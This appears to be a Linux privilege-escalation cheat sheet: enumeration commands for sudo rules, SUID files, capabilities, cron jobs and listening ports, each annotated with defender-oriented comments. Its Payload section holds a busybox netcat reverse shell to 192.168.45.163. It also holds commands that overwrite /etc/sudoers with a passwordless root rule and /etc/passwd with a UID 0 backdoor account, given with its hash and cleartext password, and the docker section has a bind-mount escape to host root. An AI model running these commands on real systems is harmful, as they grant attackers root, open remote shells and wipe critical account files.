Sudo
# Enumerate the sudo rules that apply to the current user. From a hardening
# view, any NOPASSWD or wildcard rule surfaced here is a finding to remove.
sudo -l
Credential Find:
# Case-insensitive search of regular files under the current directory for the
# literal string "password =" (-I skips binaries, -l prints only filenames,
# -- ends option parsing); permission errors are discarded via 2>/dev/null.
# Plaintext credentials in config files are the defect to fix, not the search.
find . -type f -exec grep -iIl -- "password =" {} + 2>/dev/null
Group:
# Print uid, gid and supplementary groups of the current user; membership in
# administrative groups (wheel, docker, …) is what a reviewer checks here.
id
Opt
# /opt holds locally installed, non-packaged software; list it to see which
# third-party tools are present on the host.
cd /opt
ls
SUID Files
# Regular files with the setuid bit set (-perm -4000); errors suppressed.
# Defenders: diff this list against the distribution baseline — unexpected
# entries are indicators of compromise or misconfiguration.
find / -type f -perm -4000 2>/dev/null
Writeable Path
# Directories writable by the current user, up to five levels deep.
# NOTE: GNU find prints a warning when -maxdepth follows -type; the result set
# is unaffected. Writable system directories are a hardening finding.
find / -type d -maxdepth 5 -writable 2>/dev/null
Binary Capabilities:
# Recursively list files that carry file capabilities; errors suppressed.
# Capabilities granted to binaries should be reviewed as carefully as setuid.
getcap -r / 2>/dev/null
Scheduled Tasks
# System-wide cron table (per-user crontabs and /etc/cron.d are not shown).
cat /etc/crontab
# pspy64 is a third-party process-monitoring binary that is not part of this
# page; it is presumed to have been placed in the current directory — confirm.
./pspy64
Local listening ports
# Listening TCP/UDP sockets with owning process (-p shows other users'
# processes only when run as root); grep -n numbers lines, -i ignores case.
# netstat is deprecated on modern Linux in favour of ss.
netstat -antup | grep -ni listen
# Find configuration under /etc that references ports 8080 or 8081
# (-w whole-word match, -R recursive, -n line numbers); errors suppressed.
grep -nRw '8080\|8081' /etc/* 2>/dev/null
Docker
# Images available to the local docker daemon.
docker images
# Starts a redmine container with the host root filesystem bind-mounted at /mnt
# and chroots into it, which is why docker-group membership is root-equivalent.
# Defenders: restrict the docker socket/group and alert on containers started
# with a bind mount of "/".
docker run -v /:/mnt --rm -it redmine chroot /mnt bash
Payload
# Reverse shell: busybox nc connects out to 192.168.45.163:80 and attaches
# /bin/bash to the socket (-e). An outbound connection from a server on port 80
# carrying an interactive shell is a strong detection signal.
busybox nc 192.168.45.163 80 -e /bin/bash
# Overwrites /etc/sudoers with a single passwordless rule for "user". Any write
# to this file is high-signal for file-integrity monitoring / auditd.
echo "user ALL=(root) NOPASSWD: ALL" > /etc/sudoers
# Overwrites /etc/passwd with one UID 0 account "tony" whose md5-crypt hash
# ($1$ prefix) sits in the password field. A new UID 0 entry is an indicator
# of compromise that account-audit tooling should flag.
echo 'tony:$1$test$28Tmd0tsvqI1Eq.TDxcaq/:0:0:tony,,,:/root:/bin/bash' > /etc/passwd;
# Presumably the cleartext corresponding to the hash above — not verifiable here.
tony:password